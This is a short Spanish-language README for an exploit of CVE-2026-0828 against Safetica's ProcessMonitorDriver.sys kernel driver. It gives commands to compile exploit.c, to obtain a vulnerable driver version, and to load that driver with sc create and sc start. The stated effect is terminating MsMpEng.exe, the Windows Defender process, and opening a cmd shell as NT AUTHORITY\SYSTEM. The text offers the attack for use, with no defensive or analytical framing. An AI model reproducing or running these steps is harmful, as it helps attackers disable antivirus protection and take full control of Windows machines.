
Exploit para CVE-2026-0828 dirigido a Safetica ProcessMonitorDriver.sys para terminar procesos y lanzar un shell de SYSTEM.
CVE-2026-0828 Compilación (Build): Abra el Símbolo del sistema para desarrolladores de Visual Studio (x64 Native Tools) y compile el código
: bash
cl.exe /W3 /O1 /nologo exploit.c /Fe:exploit.exe
Preparación: Asegúrese de que en la máquina de pruebas esté instalado el controlador vulnerable de Safetica (ProcessMonitorDriver.sys). Si no está presente, deberá conseguirlo (por ejemplo, desde la distribución de Safetica versión < 11.26.19)
.
Carga del controlador (como Administrador): El controlador debe estar cargado en el sistema. Esto se puede hacer mediante la consola con privilegios de administrador
: bash
sc create STProcessMonitor type= kernel binPath= "C:\full\path\to\ProcessMonitorDriver.sys" sc start STProcessMonitor
Ejecución del exploit: Ahora ejecute exploit.exe. Este finalizará el proceso especificado (en el código es MsMpEng.exe) y abrirá una nueva ventana de cmd.exe con privilegios de NT AUTHORITY\SYSTEM